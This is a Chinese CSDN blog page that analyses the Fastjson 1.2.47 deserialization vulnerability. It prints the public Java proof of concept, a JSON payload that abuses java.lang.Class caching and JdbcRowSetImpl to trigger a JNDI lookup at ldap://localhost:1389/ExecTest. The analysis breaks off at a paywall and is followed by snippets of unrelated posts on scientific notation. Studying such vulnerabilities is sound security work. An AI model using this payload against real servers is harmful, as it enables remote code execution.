fastjson string转对象 科学计数法_Fastjson历史漏洞研究(二)

最新推荐文章于 2024-05-29 08:39:22 发布
最新推荐文章于 2024-05-29 08:39:22 发布
阅读量851 收藏
点赞数
文章标签: fastjson string转对象 科学计数法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42412194/article/details/113071374
版权
本文深入分析了Fastjson 1.2.47版本的一个安全漏洞,涉及""a"":{""@type"":""java.lang.Class
摘要由CSDN通过智能技术生成

cd4070cb8d611da6eb380a9d4dba79c7.png

0x00 前言

本文衔接上一篇文章《FastJson历史漏洞研究(一)》,继续探讨一下FastJson的历史漏洞。这次将要介绍的是Fastjson 1.2.47版本存在的漏洞成因以及其利用方式。

0x01 Fastjson 1.2.47漏洞分析

Fastjson 1.2.47版本漏洞与上篇文章中介绍的几处漏洞在原理上有着很大的不同。与Fastjson历史上存在的大多数漏洞不同的是,Fastjson 1.2.47版本的漏洞利用在AutoTypeSupport功能未开启时进行

首先来看一下公开的poc

public class demo {
        public static void main(String[] args) {
            String payload = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}," +                "\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:1389/ExecTest\",\"autoCommit\":true}}";        Object obj = JSON.parseObject(payload);        System.out.println(obj);    }}
从代码中可见,与以往利用不同的是,该poc中构造了两个json字符串

1、"a":{"\@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}

2、"b":{"\@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:1389/ExecTest","autoCommit":true}

为了弄清楚这样构造的意义,我们来动态调试一下这个漏洞

程序首先解析第一个json字符串

"a":{"\@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"} 解析过程

我们跳过部分FastJson解析流程,直接来看checkAutoType安全模块时的操作。对这个字符串中\@type字段进行校验

在位于com/alibaba/fastjson/parser/ParserConfig.java的checkAutoType安全模块中,程序首先进入了这个分支,程序调用getClassFromMapping对typeName进行解析,typeName即为字符串中@type的值,在第一个json字符串中,这个值为"java.lang.Class"

c6039e546474f5e5c245acaf2b802ad6.png

我们跟入位于com/alibaba/fastjson/util/TypeUtils.java 的getClassFromMapping

afb216c026f60dde779a949facb78653.png

从上图代码可见,程序想从mappings中寻找键名为”java.lang.Class”的元素并返回对应的键值。值得一提的是,mappings集合与后文将要讲到的buckets集合对这个漏洞至关重要,这二者是这个漏洞产生的核心因素

  • mappings集合

mappings中存储的数据都是什么呢?经过调试可以发现其中数据形式如下图中所展示

最低0.47元/天 解锁文章
耀答案
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson字符串对象时候,数字变成科学计数法
无术不学的博客
09-11 3154
变之前设置下面两句话 即可 , SerializeConfig config = SerializeConfig.getGlobalInstance(); config.put(BigDecimal.class, ToStringSerializer.instance); com.alibaba.fastjson.JSONObject v = com.alibaba.fastjson.JSONObject.parseObject(val); 上图 BigDecimal 是数字的格式,有long double
fastjson 输出double类型强制科学计数法问题
12-21
在json输出的时候,当double类型的数值过大或者过小的时候,往会在内部被强制化为科学计数法形式输出,如果不需要科学计数法,则可以通过使用BigDecimal类来表示double类型,代码如下: Java版本: import com.alibaba.fastjson.JSONObject; import java.math.BigDecimal; /** * Created by zhoujm on 2020/4/1. */ public class TestJson { public static void main(String[] args) { JSO
SpringBoot 返回 BigDecimal ,数值太小导致返回科学计数法
最新发布
z69183787的专栏
05-29 369
1、自定义 FastJsonHttpMessageConverter ,放置list首位或,移除其他 json messageConverter。1、自定义ObjectMapper替换 或 自定义 MappingJackson2HttpMessageConverter。SerializerFeature.WriteBigDecimalAsPlain //防止科学计数法。2、配置 objectMapper。针对使用 Jackson 返回。针对使用 Fastjson返回。
Java - Fastjson 序列化/反序列化之『科学计数法』解决方案
牧码的博客
11-02 1478
Java - Fastjson 序列化/反序列化之『科学计数法』解决方案
fastjson浮点类型显示科学计数法的问题
jackllvv的博客
08-17 1万+
最近在使用fastjson的过程中,发现对于Double和Float类型的字段,如果在为字符串时过长,在序列化的过程中, fastjson会默认将其化为科学计数法。比如Double d = 11111111111.1111111111111; 在序列化的过程中,fastJson会将其换为1.111111111111111E10的形式,这显然不是我们需要的结果。那么如何解决这个问题呢? 1
fastjson double科学计数问题
afasdsdfgsdgf的博客
09-24 944
fastjson 默认情况下较大的double会自动换为科学计数,导致有些数据变形,为了解决这个问题,请将一下代码放在你的类里面,意思就是double格式化时,最多保留6位小数,不够的话自己在加上对应个数的# private static SerializeConfig serializeConfig = SerializeConfig.getGlobalInstance(); static { serializeConfig.put(Double.class, new DoubleSeri
接口返回JSON数据避免小数出现科学计数处理
花若盛开蝴蝶自来,你若精彩天自安排。
11-29 4536
接口返回json数据,避免小数变成科学计数
fastjson-1.2.66_fastjson-1.2.66.jar_Fastjson_
09-30
- **自定义Map Key**:对于Map中的Key,Fastjson可以处理非String类型的Key,只要提供适当的序列化和反序列化策略。 7. **其他功能** - **JSONPath支持**:Fastjson实现了JSONPath,一种类似于XPath的查询语言,...
基于FastJson实现JSON与Java对象
12-21
2.对象与字符串之间的互 //将对象换成为字符串 String UserDoStr = JSON.toJSONString(userDo); //字符串换成为对象 UserDo userDo = JSON.parseObject(UserDoStr, UserDo.class); 3.对象集合与字符串之间的...
详谈fastjson对象格式化成json时的两个问题
10-19
在使用Fastjson将Java对象换成JSON格式时,可能会遇到两个常见的问题,这些问题与对象的继承结构和集合处理有关。本文将深入探讨这两个问题,并提供相应的解决方案。 首先,让我们来看第一个问题:关于对象继承的...
fastjson-1.2.70_JSON_
09-28
例如,JSON数组中的每个元素可能又是另一个复杂的JSON对象Fastjson可以轻松地处理这种情况。同时,它还支持自定义类型换器,这对于处理特殊类型的字段非常有用。 除此之外,Fastjson提供了安全模式。在某些情况...
解决Java中由于数据太大自动换成科学计数法的问题
08-27
今天小编就为大家分享一篇解决Java中由于数据太大自动换成科学计数法的问题,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
jackson json map 数值科学计数法的问题解决.docx
03-12
将json换为map之后,如果数值类型太多会在换之后出现科学计数法的问题,经研究jackson源码、网上百度资料得知可以通过设置一些参数解决该问题
fastjosn:String字符串json对象和java对象的相互
kswkly的博客
06-27 1977
fastjson简单用法json字符串java对象java对象json字符串 在处理前后端数据时经常需要将json成java对象,或者将java对象成json,下面简单介绍下如何使用fastjson进行两者间的化。 json字符串java对象 fastjson中定义了一个JSONObject对象,它有很多方法能实现json字符串和java对象化,如下: String str = "{\"name\":\"tom\",\"age\":\"12\"}"; //json字符串化成json对象 J
fastjson stringjsonobject_fastjson源码--进大厂的最后一脚 下
weixin_39847887的博客
01-10 1345
2.3.8.2 反序列化过程反序列化的含义是将跨语言的json字符串换成java对象思路public static T parseObject(String text, Class clazz) { /** 根据指定text,返回期望的java对象类型class */ return parseObject(text, clazz, new Feature[0]); }关键步骤 1创建解析配置Pa...
FastjsonString、JSONArray、JSONObject之间相互
weixin_44961626的博客
11-25 5326
简介 ​ Fastjson 是阿里巴巴的开源JSON解析库,Fastjson 是一个 Java 库,可以将 Java 对象换为 JSON 格式,当然它也可以将 JSON 字符串换为 Java 对象Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象Fastjson 特性 提供服务器端、安卓客户端两种解析工具,性能表现较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互换。调用toJSON..
Java中用fastjsonString、JSONObject、JSONArray相互
热门推荐
SenKnight 的博客
08-30 4万+
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean 下面主要是本人在工作中经常用到的关于String、JSONObject、JSONArray的相互装换 String——>>>JSONArray String st = "[{name:Tim,age...
fastjson入门(一)
无名小辈
04-28 282
1.什么是fastjson fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串, 也可以从JSON字符串反序列化到JavaBean。 Fastjson 是一个 Java 库,可以将 Java 对象换为 JSON 格式,当然它也可以将 JSON 字符串换为 Java 对象。 Fastjs...
fastjson 科学计数法
09-07
默认情况下,当使用Fastjson序列化时,它会将大数字换为科学计数法的形式。例如,对于Double类型的数字11111111111.1111111111111,Fastjson会将其换为1.111111111111111E10的形式。 这可能不是我们想要的结果。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值